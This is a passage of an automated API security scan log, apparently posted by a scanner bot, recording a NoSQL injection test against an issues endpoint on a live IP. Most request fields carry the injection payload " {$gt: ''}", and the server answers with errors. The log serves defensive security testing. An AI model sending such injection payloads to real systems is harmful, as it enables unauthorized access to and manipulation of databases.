max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZDlkZDYyODQtNWQ1MS00Njc2LWJkYjUtMTY1ODdhMjRjNDg3; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:23 GMT"]] 00:43:23 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:23.825+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:23 [D] [AVIUPBPNSITimebound] : Response time [589] 00:43:23 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [589 < 7000 OR 589 > 10000] result [Passed] 00:43:23 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:43:24 [D] [AVIUPBPNSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/issues/ui] 00:43:24 [D] [AVIUPBPNSITimebound] : Method [POST] 00:43:24 [D] [AVIUPBPNSITimebound] : Authorization [Default] 00:43:24 [D] [AVIUPBPNSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]}] 00:43:24 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : " {$gt: ''}", "assignedTo" : " {$gt: ''}", "createdBy" : "", "createdDate" : "", "description" : " {$gt: ''}", "endpoint" : " {$gt: ''}", "env" : " {$gt: ''}", "failedAssertions" : " {$gt: ''}", "headers" : [ "RDoICxba" ], "id" : "", "inactive" : false, "issueName" : " {$gt: ''}", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : " {$gt: ''}", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " {$gt: ''}", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " {$gt: ''}", "version" : "" }, "refId" : " {$gt: ''}", "version" : "" }, "requestBody" : " {$gt: ''}", "responseBody" : " {$gt: ''}", "responseHeaders" : " {$gt: ''}", "result" : " {$gt: ''}", "statusCode" : " {$gt: ''}", "tags" : [ "RDoICxba" ], "version" : "" }] 00:43:24 [D] [AVIUPBPNSITimebound] : Status code [200] 00:43:24 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=M2EyY2FiZDAtMGI1MC00MTMwLThlOGQtOTUxYjUxMDhjZDE2; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:23 GMT"]] 00:43:24 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:24.414+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:43:24 [D] [AVIUPBPNSITimebound] : Response time [585] 00:43:24 [D] [AVIUPBPNSITimebound] : Response size [203] 00:43:24 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [585 < 7000 OR 585 > 10000] result [Passed] 00:43:24 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
IMPORTANT LINKS
Vulnerability Details: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8093e87b0686f1017b13c3d1174e50/details
Project: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/allScans
Environment: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/environments/8a8093567a8012b6017a803bf3181500/edit
Scan Dashboard: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/profiles/8a8093567a8012b6017a803c070d16cb/runs/8a8093e87b0686f1017b13c24e804c82
Playbook: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/playbooks/ApiV1IssuesUiPostBodyParamNoSqlInjectionTimebound
Coverage: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/categories
Code Sample: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8093e87b0686f1017b13c3d1174e50/codesamples
PS: Please contact support@apisec.ai for apisec access and login issues.
--- apisec Bot ---